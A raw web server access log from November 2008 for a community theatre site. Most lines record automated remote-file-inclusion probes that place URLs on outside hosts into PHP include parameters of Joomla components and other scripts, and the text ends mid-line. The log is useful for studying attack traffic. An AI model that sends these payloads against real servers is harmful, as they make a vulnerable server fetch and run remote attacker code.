70.85.149.242 - - [21/Nov/2008:21:44:39 -0800] "GET /galeria.php?start=0&kategoria=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "villageplayers.org"
66.34.133.35 - - [21/Nov/2008:21:44:43 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:45:26 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:45:27 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
194.177.196.2 - - [21/Nov/2008:21:45:49 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:46:26 -0800] "GET /logs/access_080711.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:46:37 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:46:37 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "villageplayers.org"
198.65.57.223 - - [21/Nov/2008:21:47:14 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.0" 200 763 "-" "libwww-perl/5.50" "villageplayers.org"
118.82.127.125 - - [21/Nov/2008:21:47:43 -0800] "GET /common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
80.79.115.210 - - [21/Nov/2008:21:47:48 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:49:58 -0800] "GET /logs/access_081104.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:49:58 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:49:59 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:50:05 -0800] "GET /logs/access_080622.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
69.73.138.140 - - [21/Nov/2008:21:50:07 -0800] "GET /logs/access_081104.log/header.inc.php?sIncPath=http://www.iv.org.ua/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.villageplayers.org"
69.73.138.140 - - [21/Nov/2008:21:50:07 -0800] "GET /header.inc.php?sIncPath=http://www.iv.org.ua/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.villageplayers.org"
69.73.138.140 - - [21/Nov/2008:21:50:07 -0800] "GET /logs/header.inc.php?sIncPath=http://www.iv.org.ua/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:50:26 -0800] "GET /logs/access.log/errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:50:26 -0800] "GET /errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:50:31 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:50:31 -0800] "GET /index.php?DOCUMENT_ROOT=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:50:31 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:52:52 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:52:53 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:52:53 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:52:54 -0800] "GET /logs/access_080915.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:53:24 -0800] "GET /logs/access.log/errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:53:24 -0800] "GET /errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:21:53:24 -0800] "GET /logs/errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:54:06 -0800] "GET /logs/access_080826.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:54:06 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
85.214.21.28 - - [21/Nov/2008:21:54:06 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:54:25 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:54:25 -0800] "GET /logs//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:54:26 -0800] "GET /?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "villageplayers.org"
212.176.205.147 - - [21/Nov/2008:21:55:10 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mykr.net/bbs/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
74.220.207.79 - - [21/Nov/2008:21:55:30 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
74.220.207.79 - - [21/Nov/2008:21:55:30 -0800] "GET /logs/access_080921.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
211.43.211.133 - - [21/Nov/2008:21:55:33 -0800] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wfc.edu.tw/~wwwme/bulletin/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
74.220.207.79 - - [21/Nov/2008:21:55:33 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:55:43 -0800] "GET /?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:55:43 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "villageplayers.org"
211.202.2.220 - - [21/Nov/2008:21:55:43 -0800] "GET /logs//?path%5Bdocroot%5D=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "villageplayers.org"
210.59.227.15 - - [21/Nov/2008:21:56:10 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.villageplayers.org"
210.59.227.15 - - [21/Nov/2008:21:56:12 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "villageplayers.org"
210.59.227.15 - - [21/Nov/2008:21:56:13 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:56:26 -0800] "GET /logs/access_080624.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:56:37 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:56:37 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
87.106.16.18 - - [21/Nov/2008:21:56:38 -0800] "GET /logs/access_081104.log//admin/business_inc/saveserver.php?thisdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
74.220.207.79 - - [21/Nov/2008:21:57:11 -0800] "GET /logs/access_081104.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
77.221.130.14 - - [21/Nov/2008:21:57:50 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.villageplayers.org"
77.221.130.14 - - [21/Nov/2008:21:57:50 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.villageplayers.org"
77.221.130.14 - - [21/Nov/2008:21:57:50 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.villageplayers.org"
80.79.115.210 - - [21/Nov/2008:21:58:03 -0800] "GET /?sourcedir=http://excelsior-guild.net/vnc/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "villageplayers.org"
211.43.211.133 - - [21/Nov/2008:21:58:10 -0800] "GET /logs/access_081104.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.wfc.edu.tw/~wwwme/bulletin/data/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:58:29 -0800] "GET /logs/access_080826.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:58:29 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
208.66.76.50 - - [21/Nov/2008:21:58:29 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.villageplayers.org"
38.103.63.56 - - [21/Nov/2008:21:58:44 -0800] "GET /logs/access_080717.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.villageplayers.org"
77.221.130.14 - - [21/Nov/2008:21:58:49 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.villageplayers.org"
77.221.130.14 - - [21/Nov/2008:21:58:49 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.villageplayers.org"
77.221.130.14 - - [21/Nov/2008:21:58:50 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:59:02 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:59:02 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:59:02 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.villageplayers.org"
66.40.52.28 - - [21/Nov/2008:21:59:13 -0800] "GET /logs/access_081104.log//admin/business_inc/saveserver.php?thisdir=http://shemouth.nimunet.com/irc/48/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
66.40.52.28 - - [21/Nov/2008:21:59:13 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://shemouth.nimunet.com/irc/48/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
66.40.52.28 - - [21/Nov/2008:21:59:13 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://shemouth.nimunet.com/irc/48/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:59:28 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:59:28 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.villageplayers.org"
212.12.123.154 - - [21/Nov/2008:21:59:28 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.villageplayers.org"
85.43.93.220 - - [21/Nov/2008:21:59:50 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:22:00:26 -0800] "GET /logs/access_081104.log//admin/business_inc/saveserver.php?thisdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:22:00:26 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
217.111.67.5 - - [21/Nov/2008:22:00:26 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.dhammajak.net/guestbook/img/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:22:00:29 -0800] "GET /logs/access_081003.log//common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:22:00:29 -0800] "GET /common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:22:00:30 -0800] "GET /logs//common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:22:00:55 -0800] "GET /logs/access_081003.log//common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:22:00:55 -0800] "GET /common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
118.82.127.125 - - [21/Nov/2008:22:00:55 -0800] "GET /logs//common/db.php?commonpath=http://www.luzaclub.ru/news/rissiord.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:22:01:52 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:22:01:52 -0800] "GET //vwar/backup/errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
207.44.238.31 - - [21/Nov/2008:22:01:52 -0800] "GET /logs///vwar/backup/errors.php?error=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.villageplayers.org"
74.220.207.79 - - [21/Nov/2008:22:02:04 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "villageplayers.org"
74.220.207.79 - - [21/Nov/2008:22:02:04 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "villageplayers.org"
124.139.67.70 - - [21/Nov/2008:22:02:32 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.villageplayers.org"
124.139.67.70 - - [21/Nov/2008:22:02:32 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice